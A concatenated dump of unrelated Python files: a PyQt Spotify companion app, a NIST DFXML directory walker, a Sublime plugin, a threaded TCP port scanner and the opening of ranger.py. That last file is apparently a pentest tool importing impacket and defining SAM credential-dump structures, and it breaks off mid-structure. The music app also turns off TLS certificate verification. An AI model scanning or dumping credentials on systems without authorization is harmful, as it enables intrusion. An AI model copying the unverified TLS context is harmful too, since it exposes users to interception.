self.lyrics_expando_btn.clicked.connect(self.expand_lyrics)
self.multi_frame_window.add_frame(self.lyrics_frame)
self.lyrics_nam = QtNetwork.QNetworkAccessManager()
self.lyrics_nam.finished.connect(self.lyrics_handler)
self.get_lyrics()
def init_review_frame(self):
"""
Initialize Review (Pitchfork) frame and make the initial async request to Pitchfork & Metacritic.
"""
x = self.window_w * 2 / 3
y = self.window_h / 2
w = self.window_w / 3
h = self.window_h * 0.37
title_x = 10
title_y = 5
self.review_frame = model.Frame(
self, self.multi_frame_window, x,y, w,h, 'review_frame'
)
self.review_frame.set_display_title('Reviews', title_x, title_y)
self.review_expando_btn = self.review_frame.create_expando_button()
self.review_expando_btn.clicked.connect(self.expand_review)
self.multi_frame_window.add_frame(self.review_frame)
self.init_metacritic_frame()
self.get_pitchfork_review()
self.get_metacritic_review()
def init_metacritic_frame(self):
"""
Initialize Metacritic frame.
"""
x = self.window_w * 2/3
y = self.window_h/2 + self.window_h*0.37
w = self.window_w / 3
h = self.window_h * 0.13
self.metacritic_frame = model.Frame(
self, self.multi_frame_window, x,y, w,h, 'metacritic_frame'
)
self.multi_frame_window.add_frame(self.metacritic_frame)
def init_images_frame(self):
"""
Initialize Images frame and make the initial async requests to Musikki and Flickr.
"""
x = self.window_w * 2 / 3
y = 0
w = self.window_w / 3
h = self.window_h / 2
title_x = 10
title_y = 5
self.images_frame = model.Frame(
self, self.multi_frame_window, x,y, w,h, 'images_frame'
)
self.images_frame.set_display_title('Images', title_x, title_y)
self.multi_frame_window.add_frame(self.images_frame)
self.images_nam = QtNetwork.QNetworkAccessManager()
self.images_nam.finished.connect(self.musikki_images_handler)
self.get_images()
def init_social_frame(self):
"""
Initialize Social frame and make the initial async requests to Musikki.
"""
x = self.window_w / 3
y = self.window_h * 0.75
w = self.window_w / 3
h = self.window_h * 0.25
self.social_frame = model.Frame(
self, self.multi_frame_window, x,y, w,h, "social_frame"
)
self.social_frame.set_display_title("Social", 10, 5)
self.multi_frame_window.add_frame(self.social_frame)
self.social_nam = QtNetwork.QNetworkAccessManager()
self.social_nam.finished.connect(self.social_handler)
if self.musikki_artist.is_found:
self.musikki_artist.get_social_media_twitter(self.social_nam)
else:
self.social_frame.set_display_text('No results for current artist.', 10, 45)
def get_images(self):
"""Spawn a thread to request images from Flickr.
Thread will signal to update_images_frame() handler with the downloaded images.
"""
if self.musikki_artist.is_found:
self.musikki_artist.get_full_images(self.images_nam)
requester = flickr_thread.Requester()
requester.flickr_reciever.connect(self.update_images_frame)
requester.get_images(self.current_artist)
def get_pitchfork_review(self):
"""Spawn a thread to fetch a review for current album from Pitchfork.com.
Thread will signal to update_review_frame() handler with the downloaded review.
"""
requester = reviews.Requester()
requester.pitchfork_receiver.connect(self.update_review_frame)
artist, album = self.format_unicode_alpha([self.current_artist, self.current_album])
requester.get_pitchfork_review(artist, album)
def get_metacritic_review(self):
"""Spawn a thread to fetch a review for current album from a Metacritic API.
Thread will signal to update_review_frame() handler with the downloaded review.
"""
requester = reviews.Requester()
requester.metacritic_receiver.connect(self.update_review_frame)
requester.get_metacritic_review(self.current_artist, self.current_album)
def update_everything(self):
"""
Fetch new info for all frames.
"""
self.update_current_playing()
self.playback_frame.set_display_title(
self.current_playing, self.playback_title_x, self.playback_title_y
)
self.update_artist_info(update_playback=False)
self.update_album_info(update_playback=False)
self.update_song_info(update_playback=False)
def update_artist_info(self, update_playback=True):
"""
Fetch new info for the following frames, which are dependent on artist:
Bio, News, Social Media, Images
"""
if update_playback:
self.update_current_playing()
self.playback_frame.set_display_title(self.current_playing, 10, 10)
self.musikki_artist = musikki.search(self.get_current_artist())
self.musikki_artist.get_full_bio(self.bio_nam)
self.musikki_artist.get_news(self.news_nam)
self.musikki_artist.get_social_media_twitter(self.social_nam)
self.images_frame.clear_images_list()
self.get_images()
def update_song_info(self, update_playback=True):
"""
Fetch new info for the following frames, which are dependent on song:
Lyrics
"""
if update_playback:
self.update_current_playing()
self.playback_frame.set_display_title(self.current_playing, 10, 10)
self.get_lyrics()
def update_album_info(self, update_playback=True):
"""
Fetch new info for the following frames, which are dependent on album:
Reviews: Pitchfork, Metacritic
"""
if update_playback:
self.update_current_playing()
self.playback_frame.set_display_title(self.current_playing, 10, 10)
self.get_pitchfork_review()
self.get_metacritic_review()
def update_current_playing(self):
"""
Update formatted playback, artist, song and album strings from Spotify.
"""
self.current_playing = self.get_current_playing()
self.current_artist = self.get_current_artist()
self.current_song = self.get_current_song()
self.current_album = self.get_current_album()
print('='*60, '\n\n-----Now Playing-----')
print('Artist:\t', self.current_artist)
print('Song:\t', self.current_song)
print('Album:\t', self.current_album, '\n')
def get_lyrics(self, url=''):
"""Make an async request to Genius.com for lyrics.
Args:
url (str) -- Either the url we know or the one returned in a 301 response.
"""
artist, song = self.format_unicode_alpha([self.current_artist, self.current_song])
print('Searching lyrics for: ', artist, ' - ', song)
if url == '':
url = "https://genius.com/%s-%s-lyrics" % (artist.replace(' ', '-'), song.replace(' ', '-'))
req = QtNetwork.QNetworkRequest(QtCore.QUrl(url))
self.lyrics_nam.get(req)
def set_lyrics(self, url='', lyrics_exist=True):
"""Make synchronous lyrics request, then set text in the lyrics frame.
Args:
url (str) -- URL to request lyrics if not using default URL
lyrics_exist (bool) -- Don't make request for lyrics if you know they don't exist.
"""
error = "Error: Could not find lyrics."
proxy = urllib.request.getproxies()
# remove punctuation and convert to English alphabet
artist, song = self.format_unicode_alpha([self.current_artist, self.current_song])
if lyrics_exist:
try:
if url == '':
url = "https://genius.com/%s-%s-lyrics"%(artist.replace(' ', '-'),song.replace(' ', '-'))
lyricspage = requests.get(url, proxies=proxy)
soup = BeautifulSoup(lyricspage.text, 'html.parser')
lyrics = soup.text.split(' Lyrics')[3].split('More on Genius')[0]
if artist.lower().replace(" ", "") not in soup.text.lower().replace(" ", ""):
lyrics = error
self.lyrics_frame.set_results(True)
except Exception:
lyrics = error
else:
lyrics = error
# set those lyrics on the frame
self.lyrics_frame.set_display_text(lyrics, 10, 45, 'lyrics_text')
def format_unicode_alpha(self, strings):
"""Removes punctuation and replaces non-English alphabet chars with closest equivalent.
Args:
strings (list:str) -- A list of strings or single string to be formatted
"""
formatted_strings = []
is_list = True
if isinstance(strings, str):
is_list = False
strings = [strings]
for s in strings:
s = unidecode.unidecode(s)
s = s.translate(str.maketrans('','',string.punctuation))
formatted_strings.append(s)
return (formatted_strings if is_list else formatted_strings[0])
def update_review_frame(self, review):
"""Reviews Handler.
Args:
review (str:object) -- Either Pitchfork formatted string or a metacritic.Review object
Review object consists of the following:
artist album date critic_rating critic_count user_rating user_count img_url
"""
# Pitchfork frame
if isinstance(review, str):
self.review_frame.set_results(True)
self.review_frame.set_display_text(review)
# Metacritic frame
elif isinstance(review, object):
default_image = QPixmap(os.path.dirname(__file__)+'/info-icon.png')
if not review.has_review:
self.metacritic_frame.default_metacritic_content(default_image)
else:
try:
album_image = urllib.request.urlopen(review.img_url).read()
except:
album_image = default_image
review.pixmap = album_image
self.metacritic_frame.add_metacritic_content(review)
print('\n-----Metacritic Results-----')
print(review.artist, ' - ', review.album)
print('Critic Score:\t', review.critic_rating, '\t(',review.critic_count,' reviews)')
print('User Score:\t', review.user_rating, '\t(',review.user_count,' reviews)\n')
def update_images_frame(self, images):
"""Images handler.
Args:
images (list) -- List of QPixmaps
"""
if len(images) > 0:
# add image scrolling buttons
self.images_frame.create_image_buttons()
self.images_frame.get_image_next_button().clicked.connect(self.next_image_handler)
self.images_frame.get_image_prev_button().clicked.connect(self.prev_image_handler)
self.images_frame.get_image_next_button().show()
self.images_frame.get_image_prev_button().show()
# add the flickr images
self.images_frame.add_flickr_artist_images(images)
def lyrics_handler(self, reply):
"""Lyrics handler.
Args:
reply (object) -- QNetworkReply
"""
er = reply.error()
if er == QtNetwork.QNetworkReply.NoError:
if reply.rawHeader(QByteArray(b'Status')) == '301 Moved Permanently':
qbyteurl = reply.rawHeader(QByteArray(b'Location'))
url = ''
for q in qbyteurl:
url += q
# parse the html for lyrics
self.set_lyrics(url)
elif reply.rawHeader(QByteArray(b'Status') != '200 OK'):
print('response not a 301 or 200. it is: ', reply.rawHeader(QByteArray(b'Status')))
else:
self.set_lyrics(url='', lyrics_exist=False)
def news_handler(self, reply):
"""News handler.
Args:
reply (object) -- QNetworkReply
"""
default_img = os.path.dirname(__file__) + '/info-icon.png'
results = {}
er = reply.error()
if er == QtNetwork.QNetworkReply.NoError:
response = reply.readAll()
document = QJsonDocument()
error = QJsonParseError()
document = document.fromJson(response, error)
json_resp = document.object()
if len(json_resp['summary'].toObject()['errors'].toArray()) == 0 \
and json_resp['summary'].toObject()['result_count'].toInt() > 0:
counter = 0
resultlist = []
for r in json_resp['results'].toArray():
if counter < 1:
r = r.toObject()
results['author'], name = [], ''
if r['author_info'] != '':
try:
if r['author_info'].toObject()['name'] != '':
name = r['author_info'].toObject()['name'].toString()
except:
name = ''
results['author'] = name
results['source'], avatar, title = [],'',''
if r['source'] != '':
if r['source'].toObject()['title'] != '':
results['src_title'] = r['source'].toObject()['title'].toString()
if r['source'].toObject()['avatar'].toString() != '':
avatar = r['source'].toObject()['avatar'].toString()
results['source'].extend([avatar, title])
results['date'], year, month, day = '','','',''
if r['publish_date'] != '':
try:
if str(r['publish_date'].toObject()['year'].toInt()) != '':
year = str(r['publish_date'].toObject()['year'].toInt())
if str(r['publish_date'].toObject()['month'].toInt()) != '':
month = str(r['publish_date'].toObject()['month'].toInt())
if str(r['publish_date'].toObject()['day'].toInt()) != '':
day = str(r['publish_date'].toObject()['day'].toInt())
except:
year, month, day = '0000', '00', '00'
results['date'] = year +'-'+ month +'-'+ day
results['mkid'] = ''
if str(r['mkid'].toInt()) != '':
results['mkid'] = str(r['mkid'].toInt())
results['title'] = ''
if r['title'].toString() != '':
results['title'] = r['title'].toString()
results['newsurl'] = ''
if r['url'].toString() != '':
results['newsurl'] = r['url'].toString()
results['summary'] = ''
if r['summary'].toString() != '':
results['summary'] = r['summary'].toString()
results['imgurl'] = ''
if r['image'].toString() != '':
results['imgurl'] = r['image'].toString()
try:
url = results['imgurl']
r = requests.get(url, stream=True)
filename = os.path.dirname(__file__)+'/images/'+results['title']+'.jpg'
with open(filename, 'wb') as fd:
for chunk in r.iter_content(chunk_size=128):
fd.write(chunk)
results['newsicon'] = QPixmap(filename)
except BaseException as e:
print(e)
results['newsicon'] = QPixmap(default_img)
else:
break
resultlist.append(results)
counter += 1
# end for
results['found'] = True
try:
results['newsicon'] = results['newsicon'] if results['newsicon'] else QPixmap(default_img)
except:
results['newsicon'] = QPixmap(default_img)
self.news_frame.add_news(results)
#end if
else:
print('No news found')
results['found'] = False
results['message'] = 'No news for this artist.'
self.news_frame.add_news(results, QPixmap(default_img))
else:
print('No news found')
results['found'] = False
results['message'] = 'No news for this artist.'
self.news_frame.add_news(results, QPixmap(default_img))
def search_bio_handler(self, reply):
"""Biography handler.
Args:
reply (object) -- QNetworkReply
"""
er = reply.error()
if er == QtNetwork.QNetworkReply.NoError:
response = reply.readAll()
document = QJsonDocument()
error = QJsonParseError()
document = document.fromJson(response, error)
json_resp = document.object()
bio = ''
for f in json_resp['full'].toArray():
f = f.toObject()
paragraph = ''
for i, t in enumerate(f['text'].toArray()):
t = t.toString()
paragraph += f['title'].toString()+'\n\n'+t.rstrip() if i==0 else (' '+t.rstrip())
bio += paragraph + '\n\n'
self.bio_frame.set_results(True)
self.bio_frame.set_display_text(bio, 10, 45, 'bio_text')
else:
self.bio_frame.set_display_text('No artist bio found.', 10, 45)
def musikki_images_handler(self, reply):
"""Musikki images handler.
Args:
reply (object) -- QNetworkReply
"""
urls, pixmaps, widths, heights = [], [], [], []
er = reply.error()
notfound_count = 0
if er == QtNetwork.QNetworkReply.NoError:
response = reply.readAll()
document = QJsonDocument()
error = QJsonParseError()
document = document.fromJson(response, error)
json_resp = document.object()
if len(json_resp['results'].toArray()) > 0:
f = json_resp['results'].toArray()
thumb = f[0].toObject()['thumbnails'].toArray()[0].toObject()
thumb_url = thumb['url'].toString()
thumb_width = thumb['width'].toInt()
thumb_height = thumb['height'].toInt()
try:
context = ssl._create_unverified_context()
data = urlopen(thumb_url, context=context).read()
pixmap = QPixmap()
pixmap.loadFromData(data)
pixmaps.append(pixmap)
except:
notfound_count += 1
urls.append(thumb_url)
widths.append(thumb_width)
heights.append(thumb_height)
if notfound_count > 0:
print(notfound_count, " 404 responses in image handler")
if len(pixmaps) > 0:
# load the biggest image as the first and only pixmap
biggest = 0
for i, p in enumerate(pixmaps):
if p.width() > biggest:
biggest = i
pixmaps[0] = pixmaps[biggest]
widths[0] = widths[biggest]
heights[0] = heights[biggest]
self.images_frame.add_musikki_artist_images(pixmaps, widths, heights)
def social_handler(self, reply):
"""Social handler.
Args:
reply (object) -- QNetworkReply
"""
er = reply.error()
if er == QtNetwork.QNetworkReply.NoError:
response = reply.readAll()
document = QJsonDocument()
error = QJsonParseError()
document = document.fromJson(response, error)
json_resp = document.object()
found = True
try:
service_name = json_resp['service_name'].toString()
except:
found = False
service_name = ''
try:
year = json_resp['timeline_posts'].toArray()[0].toObject()['date'].toObject()['year'].toInt()
month = json_resp['timeline_posts'].toArray()[0].toObject()['date'].toObject()['month'].toInt()
day = json_resp['timeline_posts'].toArray()[0].toObject()['date'].toObject()['day'].toInt()
except:
year, month, day = 0000, 00, 00
date = str(month) + '/' + str(day) + '/' + str(year)
try:
content = json_resp['timeline_posts'].toArray()[0].toObject()['content'].toString()
except:
content = ''
social_text = date + ' - via ' + service_name + '\n\n' + content
if found:
self.social_frame.set_display_text(social_text, 10, 45, 'social_text')
self.musikki_artist.twitter_search = False
elif not found:
self.social_frame.set_display_text('No social media found.', 10, 45)
self.musikki_artist.facebook_search = False
elif self.musikki_artist.facebook_search == False:
self.musikki_artist.get_social_media_facebook(self.social_nam)
else:
self.social_frame.set_display_text('No social media found.', 10, 45)
self.musikki_artist.facebook_search = False
def next_image_handler(self):
self.images_frame.next_image()
def prev_image_handler(self):
self.images_frame.prev_image()
def update_playback_display(self):
"""
Playback handler.
"""
if self.current_playing != self.get_current_playing():
if (self.current_artist == self.get_current_artist() and
self.current_song != self.get_current_song()):
if self.current_album != self.get_current_album():
print('Album change...')
self.update_album_info(update_playback=True)
self.update_song_info(update_playback=False)
else:
print('Song change...')
self.update_song_info(update_playback=True)
else:
print('Artist and song change...')
self.update_everything()
elif (self.current_artist == self.get_current_artist() and
self.current_album != self.get_current_album()):
print('Album changed but song & artist did not...')
self.update_album_info(update_playback=True)
self.update_song_info(update_playback=False)
def expand_bio(self):
if self.bio_frame.has_results():
self.build_popup(self.bio_frame)
else:
print('No bio results, so no bio popup')
def expand_lyrics(self):
if self.lyrics_frame.has_results():
self.build_popup(self.lyrics_frame)
else:
print('No lyrics results, so no lyrics popup')
def expand_review(self):
if self.review_frame.has_results():
self.build_popup(self.review_frame)
else:
print('No review results, so no review popup')
def build_popup(self, source_frame):
"""Build a SingleFrameWindow popup window.
Args:
source_frame (object) -- model.Frame is the content for the popup
"""
offset = 50
self.popup_window = view.SingleFrameWindow(self.screen_width, self.screen_height)
self.popup_window.init_popup(
self.window_x-offset, self.window_y-offset, source_frame.display_title, 'single_frame_window'
)
source_frame.create_popup(self.popup_window)
self.popup_window.add_frame(source_frame)
self.popup_window.show()
def open_spotify(self):
spotify = playback.Playback()
return spotify
def play_pause(self):
self.spotify.play_pause()
def next(self):
self.spotify.next()
def prev(self):
self.spotify.prev()
def pause(self):
self.spotify.pause()
def get_current_artist(self):
return self.spotify.get_current_artist()
def get_current_song(self):
return self.spotify.get_current_song()
def get_current_album(self):
return self.spotify.get_current_album()
def get_current_playing(self):
return self.get_current_artist() + ' - ' + self.get_current_song()
class Listener(QThread):
song_change = pyqtSignal()
"""Listener object that can run playback synchronization threads.
Args:
stored_song (str) -- formatted string (Artist - Song Title)
spotify (object) -- playback.Playback object which connects and talks to Spotify
"""
def __init__(self, stored_song, spotify):
super().__init__()
self.stored_song = stored_song.rstrip()
self.spotify = spotify
# start a synchronization thread that will close when app does
self.playback_sync_thread = Thread(target=self.sync_playback)
self.playback_sync_thread.setDaemon(True)
def run(self):
self.playback_sync_thread.start()
def sync_playback(self):
"""
Every 1 second, check the stored_song against what Spotify is currently playing.
"""
while True:
if self.stored_song != self.spotify.get_current_playing().rstrip():
self.song_change.emit()
self.stored_song = self.spotify.get_current_playing().rstrip()
sleep(1)
|
walk_to_dfxml.py
|
#!/usr/bin/env python3
# This software was developed at the National Institute of Standards
# and Technology in whole or in part by employees of the Federal
# Government in the course of their official duties. Pursuant to
# title 17 Section 105 of the United States Code portions of this
# software authored by NIST employees are not subject to copyright
# protection and are in the public domain. For portions not authored
# by NIST employees, NIST has been granted unlimited rights. NIST
# assumes no responsibility whatsoever for its use by other parties,
# and makes no guarantees, expressed or implied, about its quality,
# reliability, or any other characteristic.
#
# We would appreciate acknowledgement if the software is used.
"""Walk current directory, writing DFXML to stdout."""
__version__ = "0.4.1"
import os
import stat
import hashlib
import traceback
import logging
import sys
import collections
import functools
_logger = logging.getLogger(os.path.basename(__file__))
import dfxml.objects as Objects
#Exclude md6 from hash list borrowed from Objects.py - hashlib doesn't support md6.
walk_default_hashes = Objects.FileObject._hash_properties - {"md6"}
def filepath_to_fileobject(filepath, **kwargs):
"""
Optional arguments:
* ignore_properties - dictionary of property names to exclude from FileObject.
"""
global walk_default_hashes
fobj = Objects.FileObject()
ignore_properties = kwargs.get("ignore_properties", dict())
#_logger.debug("ignore_properties = %r." % ignore_properties)
#Determine type - done in three steps.
if os.path.islink(filepath):
name_type = "l"
elif os.path.isdir(filepath):
name_type = "d"
elif os.path.isfile(filepath):
name_type = "r"
else:
#Nop. Need to finish type determinations with stat structure.
name_type = None
# Retrieve stat struct for file to finish determining name type, and later to populate properties.
if name_type == "l":
sobj = os.lstat(filepath)
else:
sobj = os.stat(filepath)
#_logger.debug(sobj)
if name_type is None:
if stat.S_ISCHR(sobj.st_mode):
name_type = "c"
elif stat.S_ISBLK(sobj.st_mode):
name_type = "b"
elif stat.S_ISFIFO(sobj.st_mode):
name_type = "p"
elif stat.S_ISSOCK(sobj.st_mode):
name_type = "s"
elif stat.S_ISWHT(sobj.st_mode):
name_type = "w"
else:
raise NotImplementedError("No reporting check written for file type of %r." % filepath)
_should_ignore = lambda x: Objects.FileObject._should_ignore_property(ignore_properties, name_type, x)
if not _should_ignore("name_type"):
fobj.name_type = name_type
#Prime fileobjects from Stat data (lstat for soft links).
fobj.populate_from_stat(sobj, ignore_properties=ignore_properties, name_type=name_type)
#Hard-coded information: Name, and assumed allocation status.
if not _should_ignore("filename"):
fobj.filename = filepath
if not _should_ignore("alloc"):
fobj.alloc = True
if not _should_ignore("link_target"):
if name_type == "l":
fobj.link_target = os.readlink(filepath)
#Add hashes for (mostly regular) files.
if name_type in ["-", "r", "v"]:
# Check total OR
if functools.reduce(
lambda y, z: y or z,
map(
lambda x: not _should_ignore(x),
walk_default_hashes
)
):
try:
with open(filepath, "rb") as in_fh:
chunk_size = 2**22
md5obj = hashlib.md5()
sha1obj = hashlib.sha1()
sha224obj = hashlib.sha224()
sha256obj = hashlib.sha256()
sha384obj = hashlib.sha384()
sha512obj = hashlib.sha512()
any_error = False
while True:
buf = b""
try:
buf = in_fh.read(chunk_size)
except Exception as e:
any_error = True
if not _should_ignore("error"):
fobj.error = "".join(traceback.format_stack())
if e.args:
fobj.error += "\n" + str(e.args)
buf = b""
if buf == b"":
break
if not _should_ignore("md5"):
md5obj.update(buf)
if not _should_ignore("sha1"):
sha1obj.update(buf)
if not _should_ignore("sha224"):
sha224obj.update(buf)
if not _should_ignore("sha256"):
sha256obj.update(buf)
if not _should_ignore("sha384"):
sha384obj.update(buf)
if not _should_ignore("sha512"):
sha512obj.update(buf)
if not any_error:
if not _should_ignore("md5"):
fobj.md5 = md5obj.hexdigest()
if not _should_ignore("sha1"):
fobj.sha1 = sha1obj.hexdigest()
if not _should_ignore("sha224"):
fobj.sha224 = sha224obj.hexdigest()
if not _should_ignore("sha256"):
fobj.sha256 = sha256obj.hexdigest()
if not _should_ignore("sha384"):
fobj.sha384 = sha384obj.hexdigest()
if not _should_ignore("sha512"):
fobj.sha512 = sha512obj.hexdigest()
except Exception as e:
if not _should_ignore("error"):
if fobj.error is None:
fobj.error = ""
else:
fobj.error += "\n"
fobj.error += "".join(traceback.format_stack())
if e.args:
fobj.error += "\n" + str(e.args)
return fobj
def main():
global walk_default_hashes
#Determine whether we're going in threading mode or not. (Some modules are not available by default.)
using_threading = False
if args.jobs > 1:
using_threading = True #(unless supporting modules are absent)
try:
import threading
except:
using_threading = False
_logger.warning("Threading support not available. Running in single thread only.")
try:
import queue
except:
using_threading = False
_logger.warning("Python queue support not available. (If running Ubuntu, this is in package python3-queuelib.) Running in single thread only.")
dobj = Objects.DFXMLObject(version="1.2.0")
dobj.program = sys.argv[0]
dobj.program_version = __version__
dobj.command_line = " ".join(sys.argv)
dobj.dc["type"] = "File system walk"
dobj.add_creator_library("Python", ".".join(map(str, sys.version_info[0:3]))) #A bit of a bend, but gets the major version information out.
dobj.add_creator_library("Objects.py", Objects.__version__)
dobj.add_creator_library("dfxml.py", Objects.dfxml.__version__)
# Key: property.
# Value: set of name_types that should have the property ignored. "*" indicates all. No sets should be empty by the end of this setup.
ignore_properties = collections.defaultdict(set)
if args.ignore:
for property_descriptor in args.ignore:
property_descriptor_parts = property_descriptor.split("@")
property_name = property_descriptor_parts[0]
if len(property_descriptor_parts) == 1:
ignore_properties[property_name].add("*")
else:
ignore_properties[property_name].add(property_descriptor_parts[-1])
if args.ignore_hashes:
for property_name in walk_default_hashes:
ignore_properties[property_name].add("*")
#_logger.debug("ignore_properties = %r." % ignore_properties)
filepaths = set()
filepaths.add(".")
for (dirpath, dirnames, filenames) in os.walk("."):
dirent_names = set()
for dirname in dirnames:
dirent_names.add(dirname)
for filename in filenames:
dirent_names.add(filename)
for dirent_name in sorted(dirent_names):
#The relpath wrapper removes "./" from the head of the path.
filepath = os.path.relpath(os.path.join(dirpath, dirent_name))
filepaths.add(filepath)
fileobjects_by_filepath = dict()
if using_threading:
#Threading syntax c/o: https://docs.python.org/3.5/library/queue.html
q = queue.Queue()
threads = []
def _worker():
while True:
filepath = q.get()
if filepath is None:
break
try:
fobj = filepath_to_fileobject(filepath, ignore_properties=ignore_properties)
except FileNotFoundError as e:
fobj = Objects.FileObject()
fobj.filename = filepath
fobj.error = "".join(traceback.format_stack())
if e.args:
fobj.error += "\n" + str(e.args)
fileobjects_by_filepath[filepath] = fobj
q.task_done()
for i in range(args.jobs):
t = threading.Thread(target=_worker)
t.start()
threads.append(t)
for filepath in filepaths:
q.put(filepath)
# block until all tasks are done
q.join()
# stop workers
for i in range(args.jobs):
q.put(None)
for t in threads:
t.join()
else: #Not threading.
for filepath in sorted(filepaths):
fobj = filepath_to_fileobject(filepath, ignore_properties=ignore_properties)
fileobjects_by_filepath[filepath] = fobj
#Build output DFXML tree.
for filepath in sorted(fileobjects_by_filepath.keys()):
dobj.append(fileobjects_by_filepath[filepath])
dobj.print_dfxml()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--debug", action="store_true")
parser.add_argument("-i", "--ignore", action="append", help="Do not track named property on file objects. E.g. '-i inode' will exclude inode numbers from DFXML manifest. Can be given multiple times. To exclude a fileobject property of a specific file type (e.g. regular, directory, device), supply the name_type value in addition; for example, to ignore mtime of a directory, '-i mtime@d'.")
parser.add_argument("--ignore-hashes", action="store_true", help="Do not calculate any hashes. Equivalent to passing -i for each of %s." % (", ".join(sorted(walk_default_hashes))))
parser.add_argument("-j", "--jobs", type=int, default=1, help="Number of file-processing threads to run.")
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG if args.debug else logging.INFO)
if args.jobs <= 0:
raise ValueError("If requesting multiple jobs, please request 1 or more worker threads.")
main()
|
onstart.py
|
"""
plugin_loaded: Run own operations on Sublime Load.
"""
import sublime
import threading
def my_func():
"""Can run any function on Sublime start and make any initial actions"""
sublime.status_message('Sublime started...')
def plugin_loaded():
t = threading.Thread(target=my_func)
t.daemon = True
t.start()
|
tools.py
|
import json
import socket
import threading
from itertools import chain
try: # Python 3
from queue import Queue
except: # Python 2
from Queue import Queue
class Scanner(object):
q = Queue()
storage = []
def __init__(self, target, threads, known, rang, inp, out):
self.target = target
self.threads = threads
self.rang = rang
self.known = known
self.lib_ports = json.loads(inp.read())
self.output = out
def check_target(self):
try:
ip = socket.gethostbyname(self.target)
except socket.gaierror:
print('This site does not exist or DNS problem')
exit()
else:
print('\nChecking: {target} as {ip}\n'.format(target=self.target, ip=ip))
print('=======Start_Scanning=======', file=self.output)
print('\nChecking: {target} as {ip}\n'.format(target=self.target, ip=ip), file=self.output)
def echo(self):
for port in self.storage:
if self.known or str(port) in chain(self.lib_ports):
print('Port : {port} is open. ({desc})'.format(port=port, desc=self.lib_ports[str(port)]))
print('Port : {port} is open. ({desc})'.format(port=port, desc=self.lib_ports[str(port)]),
file=self.output)
else:
print('Port : {port} is open.'.format(port=port))
print('Port : {port} is open.'.format(port=port), file=self.output)
def port_scan(self, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.5)
try:
s.connect((self.target, port))
except socket.timeout:
pass
except socket.error:
pass
else:
self.storage.append(port)
finally:
s.close()
def threader(self):
while True:
worker = self.q.get()
self.port_scan(worker)
self.q.task_done()
def run(self):
self.check_target()
for x in range(self.threads):
t = threading.Thread(target=self.threader)
t.daemon = True
t.start()
if self.known:
for port, desc in self.lib_ports.items():
self.q.put(int(port))
else:
for worker in range(1, self.rang):
self.q.put(worker)
self.q.join()
self.storage.sort()
self.echo()
|
ranger.py
|
#!/usr/bin/env python
'''
Libraries
'''
import base64, sys, argparse, re, subprocess, os, time, logging, signal, urllib2, cmd, ntpath, string, random, ConfigParser, hashlib, traceback, tempfile, collections
import xml.etree.ElementTree as etree
from threading import Thread, Lock, Event
from Queue import Queue
from struct import unpack, pack
try:
import netifaces
except:
sys.exit("[!] Install the netifaces library: pip install netifaces")
try:
import nmap
except:
sys.exit("[!] Install the python-nmap library: pip install python-nmap")
try:
import netaddr
except:
sys.exit("[!] Install the netaddr library: pip install netaddr")
try:
from Crypto.Cipher import DES, ARC4, AES
from Crypto.Hash import HMAC, MD4
except Exception:
logging.critical("Warning: You don't have any crypto installed. You need PyCrypto")
logging.critical("See http://www.pycrypto.org/")
try:
from impacket import smbserver, version, ntlm, uuid, winregistry, smbconnection
from impacket.smbconnection import *
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dtypes import NULL
from impacket.examples import remcomsvc, serviceinstall, logger
from impacket.dcerpc.v5 import transport, scmr, wkst, srvs, samr, rpcrt, rrp
from impacket.dcerpc import ndrutils, atsvc
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.nt_errors import STATUS_MORE_ENTRIES
from impacket.structure import Structure
from impacket.ese import ESENT_DB
from impacket.winregistry import hexdump
#from impacket.smbconnection import SMBConnection
except Exception as e:
print("[!] The following error occured %s") % (e)
sys.exit("[!] Install the necessary impacket libraries and move this script to the examples directory within it")
'''
This pre-section contains the code from the impacket libraries and examples.
This code falls under the licenses perscribed by that code distribution.
'''
'''
IMPACKET SECRETSDUMP
'''
# Structures
# Taken from http://insecurety.net/?p=768
class SAM_KEY_DATA(Structure):
structure = (
('Revision','<L=0'),
('Length','<L=0'),
('Salt','16s=""'),
('Key','16s=""'),
('CheckSum','16s=""'),
('Reserved','<Q=0'),
)
class DOMAIN_ACCOUNT_F(Structure):
structure = (
('Revision','<L=0'),
('Unknown','<L=0'),
('CreationTime','<Q=0'),
('DomainModifiedCount','<Q=0'),
('MaxPasswordAge','<Q=0'),
('MinPasswordAge','<Q=0'),
('ForceLogoff','<Q=0'),
('LockoutDuration','<Q=0'),
('LockoutObservationWindow','<Q=0'),
('ModifiedCountAtLastPromotion','<Q=0'),
('NextRid','<L=0'),
('PasswordProperties','<L=0'),
('MinPasswordLength','<H=0'),
('PasswordHistoryLength','<H=0'),
('LockoutThreshold','<H=0'),
('Unknown2','<H=0'),
('ServerState','<L=0'),
('ServerRole','<H=0'),
('UasCompatibilityRequired','<H=0'),
('Unknown3','<Q=0'),
('Key0',':', SAM_KEY_DATA),
# Commenting this, not needed and not present on Windows 2000 SP0
# ('Key1',':', SAM_KEY_DATA),
# ('Unknown4','<L=0'),
)
# Great help from here http://www.beginningtoseethelight.org/ntsecurity/index.htm
class USER_ACCOUNT_V(Structure):
structure = (
('Unknown','12s=""'),
('NameOffset','<L=0'),
('NameLength','<L=0'),
('Unknown2','<L=0'),
('FullNameOffset','<L=0'),
('FullNameLength','<L=0'),
('Unknown3','<L=0'),
('CommentOffset','<L=0'),
('CommentLength','<L=0'),
('Unknown3','<L=0'),
('UserCommentOffset','<L=0'),
('UserCommentLength','<L=0'),
('Unknown4','<L=0'),
('Unknown5','12s=""'),
('HomeDirOffset','<L=0'),
('HomeDirLength','<L=0'),
('Unknown6','<L=0'),
('HomeDirConnectOffset','<L=0'),
('HomeDirConnectLength','<L=0'),
('Unknown7','<L=0'),
('ScriptPathOffset','<L=0'),
('ScriptPathLength','<L=0'),
('Unknown8','<L=0'),
('ProfilePathOffset','<L=0'),
('ProfilePathLength','<L=0'),
('Unknown9','<L=0'),
('WorkstationsOffset','<L=0'),
('WorkstationsLength','<L=0'),
('Unknown10','<L=0'),
('HoursAllowedOffset','<L=0'),
('HoursAllowedLength','<L=0'),
('Unknown11','<L=0'),
('Unknown12','12s=""'),
('LMHashOffset','<L=0'),
('LMHashLength','<L=0'),
('Unknown13','<L=0'),
